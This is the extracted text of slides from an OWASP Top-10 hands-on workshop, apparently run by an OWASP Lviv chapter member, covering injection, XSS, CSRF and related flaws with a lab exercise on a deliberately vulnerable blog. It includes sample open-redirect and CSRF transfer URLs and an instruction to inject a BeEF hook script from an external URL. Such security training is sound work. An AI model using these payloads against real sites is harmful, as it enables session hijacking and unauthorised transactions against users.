OWASP Top-10 Hands-on Workshop
•Security Engineer @ SoftServe•NU “LP” student
whoami
•Web Application Security Assessment•Penetration Testing•Secure Software Development Lifecycle
What we do?
•Non-profit organization•Numerous chapters around the globe•Everyone can join•Open-Source
Open Web ApplicationSecurity Project
Meetings and conferences all around the globe
@AppSecEU ‘15 in Amsterdam
Knowledge base
OWASP Top-10Injection
Broken Auth and Session
ManagementXSS
Insecure Direct Object
References
Security misconfiguration
Sensitive Data Exposure
Missing Function Level
ControlCSRF
Using Known Vulnerable
Components
Unvalidated Redirects and
Forwards
OWASP is GOOD!Hackers• Methodologies how to hack
Developers• Methodologies how to implement things securely and fix them
Testers• The same that hackers do• Methodologies how to test security stuff on their projects
Demo Time
•Either go by scenario with me or try to find 10 vulnerabilities by yourself.•No scanners (DDoS alert).•Do not attack infrastructure. Only web application vulnerabilities here.•Do not attack people around you.•No punching.
Rules
•<open redirect url>•<change pass csrf url>•<Email for SE>•Credentials:
Let’s begin
Open Redirectexample.com/smth?redirect_url=http://google.comCSRFbank.com/trans?acc1=1234&acc2=4321&ammount=10000
Open Redirect + CSRF
Cross-Site ScriptingSupply JS code instead of valid data which will be processed by the browserBroken AuthSession management flaws (HTTPOnly flag is missing in our case)
XSS + Broken Authentication
Inject this script into the website<script src=“<url to the hook>” type=“text/javascript”/>
BeEF
SQL-injectionSupply SQL operators and statements instead of valid data which will be processed with the server as SQL queries (not strings)Security misconfigurationCrypto misuse, wrong DB configuration, etcSensitive Data ExposureCritical info leakage
SQLi + Security Misconfiguration + Sensitive Data Exposure
Insecure Direct Object ReferenceAccess file you have no permission toMissing Function Level ControlAccess to restricted (sensitive) function.Using Components with known VulnerabilitiesVulnerable OS, libraries, frameworks, CMS, Algorithms, etc.
Everything else …
• Try it by yourselfhttps://github.com/Varyagovich/hole-blog• Try to fix the project• Use OWASP projects (attack/prevention cheat sheets and tools)• Contribute!
What to do next?
http://owasp-lviv.blogspot.com/
STAY SAFE!
Top Related